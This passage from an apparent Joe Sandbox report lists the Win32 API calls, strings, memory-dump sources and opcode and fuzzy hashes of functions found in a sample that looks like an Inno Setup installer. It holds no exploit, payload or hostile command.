                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1631623395-0
                                                                  • Opcode ID: c219f7c537efeea3579c9411d70f54cec51da60040311af4759150a5570cff70
                                                                  • Instruction ID: 1945ea129714beb182378817fb96d2750a9cf3de1b1d00e1964b2da952e4e1c4
                                                                  • Opcode Fuzzy Hash: c219f7c537efeea3579c9411d70f54cec51da60040311af4759150a5570cff70
                                                                  • Instruction Fuzzy Hash: 54917071B04254BFDB10DFA9DA86F9E77F4AB04304F5501BAF904AB292C778AE40DB58
                                                                  Function 0041837C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 0041838B
                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 004183A8
                                                                  • GetWindowRect.USER32(?), ref: 004183C4
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004183D2
                                                                  • GetWindowLongA.USER32(?,000000F8), ref: 004183E7
                                                                  • ScreenToClient.USER32(00000000), ref: 004183F0
                                                                  • ScreenToClient.USER32(00000000,?), ref: 004183FB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                  • String ID: ,
                                                                  • API String ID: 2266315723-3772416878
                                                                  • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                  • Instruction ID: e201a0486811adc056edcb3d82b1b2fee19cba914b7849b2462e59dde51cd5f3
                                                                  • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                  • Instruction Fuzzy Hash: A3112BB1505201ABEB00DF69C885F9B77E8AF48314F15067EFD58DB296D738D900CBA9
                                                                  Function 004555B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 004555C7
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555CD
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555E6
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045560D
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455612
                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00455623
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                  • String ID: SeShutdownPrivilege
                                                                  • API String ID: 107509674-3733053543
                                                                  • Opcode ID: bb799306ba89914f4ad5c57bf57863a6c2a35b94d1ae8b7cd1197278bb0a2066
                                                                  • Instruction ID: a3beb9442be635481dc24a528bf80296f5a6403aa298a4e6fe1161b8e304ba10
                                                                  • Opcode Fuzzy Hash: bb799306ba89914f4ad5c57bf57863a6c2a35b94d1ae8b7cd1197278bb0a2066
                                                                  • Instruction Fuzzy Hash: 46F09C70294B46B5E610A6758C17F3B71889B44759F94483AFE05EE1C3EBBCD90C4A3E
                                                                  Function 0045CFA8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045CFB1
                                                                  • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045CFC1
                                                                  • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045CFD1
                                                                  • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047EFB7,00000000,0047EFE0), ref: 0045CFF6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CryptVersion
                                                                  • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                  • API String ID: 1951258720-508647305
                                                                  • Opcode ID: 85d4af24599792157b57fa29dc23e54678ac232aa88ac9caf84ed8bf40255b48
                                                                  • Instruction ID: aa10fef992bac70bb4986ae7772dd6d371a0f40a2d4a4027d6f3d37c18d15e1e
                                                                  • Opcode Fuzzy Hash: 85d4af24599792157b57fa29dc23e54678ac232aa88ac9caf84ed8bf40255b48
                                                                  • Instruction Fuzzy Hash: A1F0F9B0940700DBE728EFB6ACC67267795EBE570AF54813BA409911A2D7784499CB1C
                                                                  Function 004975B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC,?,?,00000000,0049B628), ref: 00497607
                                                                  • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049768A
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000), ref: 004976A2
                                                                  • FindClose.KERNEL32(000000FF,004976CD,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC), ref: 004976C0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirstNext
                                                                  • String ID: isRS-$isRS-???.tmp
                                                                  • API String ID: 134685335-3422211394
                                                                  • Opcode ID: 9a85730e70ae0ef94d3f90e2644594d3b330f28a48244bbcf8e97e2e49ccae5c
                                                                  • Instruction ID: ac0d863a46ff1cebd9ad17e119327f8a53363d7c8f83829e6742a95b9ddb5555
                                                                  • Opcode Fuzzy Hash: 9a85730e70ae0ef94d3f90e2644594d3b330f28a48244bbcf8e97e2e49ccae5c
                                                                  • Instruction Fuzzy Hash: 61317471914608ABCF10EF65CC41ADEBBBCDB45714F5184FBA908E32A1DB389E458F58
                                                                  Function 004573B4 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457431
                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457458
                                                                  • SetForegroundWindow.USER32(?), ref: 00457469
                                                                  • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457741,?,00000000,0045777D), ref: 0045772C
                                                                  Strings
                                                                  • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                  • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                  • API String ID: 2236967946-3182603685
                                                                  • Opcode ID: 940e73e70c62a340de322ee314cac5bbcdf296114091b71c1d6fda21dc567a05
                                                                  • Instruction ID: ea769b4c14fff8c8931e63d970561434c834200915b3ece1ca1c477b8b524b3f
                                                                  • Opcode Fuzzy Hash: 940e73e70c62a340de322ee314cac5bbcdf296114091b71c1d6fda21dc567a05
                                                                  • Instruction Fuzzy Hash: A591E234608204EFD715CF55E9A1F5ABBF9FB49704F2180BAE80497792C638AE05DF58
                                                                  Function 00417CC8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 00417D07
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Placement$Iconic
                                                                  • String ID: ,
                                                                  • API String ID: 568898626-3772416878
                                                                  • Opcode ID: e47ccc7c96dd650ee5aa99fe86ba7015ba4d078f2208ea4d0e2f2c43afaedfea
                                                                  • Instruction ID: 4a262c2e3c05075ab76cb34d6dc8316acc681754e7f1d5d7fcc9d539da6ecccc
                                                                  • Opcode Fuzzy Hash: e47ccc7c96dd650ee5aa99fe86ba7015ba4d078f2208ea4d0e2f2c43afaedfea
                                                                  • Instruction Fuzzy Hash: A9213E716002089BDF10EFA9D8C0ADA77B8AF58314F15416AFE19DF246D638ED44CBA8
                                                                  Function 00463B04 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001,00000000,00463CC1), ref: 00463B35
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463BC4
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C56
                                                                  • FindClose.KERNEL32(000000FF,00463C7D,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C70
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseErrorFirstModeNext
                                                                  • String ID:
                                                                  • API String ID: 4011626565-0
                                                                  • Opcode ID: 9e4b21a255c9957acc66722b8fb030e028549ea653889a09ad31eb4a852fe968
                                                                  • Instruction ID: 72b898f2585741bb0186620e4596b31eb4d76daf54761f31677757d41602065f
                                                                  • Opcode Fuzzy Hash: 9e4b21a255c9957acc66722b8fb030e028549ea653889a09ad31eb4a852fe968
                                                                  • Instruction Fuzzy Hash: E941B971A00A54AFCB10EF65CC55ADEB7B8EB88705F4044BAF404B7381E67C9F488E19
                                                                  Function 00463F80 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001,00000000,00464167), ref: 00463FF5
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046403B
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 004640F0
                                                                  • FindClose.KERNEL32(000000FF,0046411B,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046410E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseErrorFirstModeNext
                                                                  • String ID:
                                                                  • API String ID: 4011626565-0
                                                                  • Opcode ID: c09ef32585df6ad6587d46f89372b88c2f663d9922c9a38294b644e1f7da4993
                                                                  • Instruction ID: c50a8f924641f435bcadfb0116f3895028b18db14577d5a571763064cbfe8c6c
                                                                  • Opcode Fuzzy Hash: c09ef32585df6ad6587d46f89372b88c2f663d9922c9a38294b644e1f7da4993
                                                                  • Instruction Fuzzy Hash: 77417674A00A18DFCB11EFA5CD859DEB7B8FB88315F4044AAF804A7341E7789E858E59
                                                                  Function 0042E92C Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E94E
                                                                  • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E979
                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E986
                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E98E
                                                                  • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E994
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                  • String ID:
                                                                  • API String ID: 1177325624-0
                                                                  • Opcode ID: d6b6e6a3c56c44dba96863f891d7151671ed351fcb177b64f87cc52fc7469355
                                                                  • Instruction ID: 3f40d390e8a5df174f84cdc2f44e01f6cfa8788c97922530efddc0b1fccee370
                                                                  • Opcode Fuzzy Hash: d6b6e6a3c56c44dba96863f891d7151671ed351fcb177b64f87cc52fc7469355
                                                                  • Instruction Fuzzy Hash: 31F0CDB23A17207AF520717A5C86F6B018CC789B68F10823BBB04FF1C1E9A85D0545AD
                                                                  Function 00482EF8 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 00482F36
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00482F54
                                                                  • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F76
                                                                  • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$IconicLong
                                                                  • String ID:
                                                                  • API String ID: 2754861897-0
                                                                  • Opcode ID: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                                  • Instruction ID: 41c7b109e84caadfbd7bdb59434551f42a7ac603c048c530ac1057f10a9e5501
                                                                  • Opcode Fuzzy Hash: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                                  • Instruction Fuzzy Hash: F30152742452009FD600F7A58E89B6B33E55B14304F480977BB009F2E6CAADD841E71C
                                                                  Function 00462578 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,0046264C), ref: 004625D0
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0046262C,?,00000000,?,00000000,0046264C), ref: 0046260C
                                                                  • FindClose.KERNEL32(000000FF,00462633,0046262C,?,00000000,?,00000000,0046264C), ref: 00462626
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 3541575487-0
                                                                  • Opcode ID: b00d8aacf9e7513e04c7705060d933e78633390233e65912034b0f0047bc0786
                                                                  • Instruction ID: 35f3f22b183c5d1ecd4ea1753066c09f008546f1eb4ef8afe9bdb694ca888e99
                                                                  • Opcode Fuzzy Hash: b00d8aacf9e7513e04c7705060d933e78633390233e65912034b0f0047bc0786
                                                                  • Instruction Fuzzy Hash: 07210B31904B047ECB11EB75CC41ACEBBBCDB49304F5084F7A808E21A1E6789E55CE5A
                                                                  Function 004241D4 Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 004241DC
                                                                  • SetActiveWindow.USER32(?,?,?,0046CB73), ref: 004241E9
                                                                    • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                    • Part of subcall function 00423B0C: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,022125AC,00424202,?,?,?,0046CB73), ref: 00423B47
                                                                  • SetFocus.USER32(00000000,?,?,?,0046CB73), ref: 00424216
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ActiveFocusIconicShow
                                                                  • String ID:
                                                                  • API String ID: 649377781-0
                                                                  • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                  • Instruction ID: 7ea1460413e76a83717bea1d3364086182948ca7ce33fd4e030d283203b7bb74
                                                                  • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                  • Instruction Fuzzy Hash: 5BF03071B0012087CB10AFAA9885B9673B8AB48305F5500BBBD05DF357C67CDC058768
                                                                  Function 00417CC6 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 00417D07
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Placement$Iconic
                                                                  • String ID:
                                                                  • API String ID: 568898626-0
                                                                  • Opcode ID: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                                  • Instruction ID: 3daf342c44424aa5ce1366acdd2a80e82e5cfeaf10da0033b5167ac39e8fb95c
                                                                  • Opcode Fuzzy Hash: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                                  • Instruction Fuzzy Hash: BE017C31204108ABDB10EE69ECC1EE773A8AF59324F154166FE09CF242D638EC8087A8
                                                                  Function 00417590 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CaptureIconic
                                                                  • String ID:
                                                                  • API String ID: 2277910766-0
                                                                  • Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
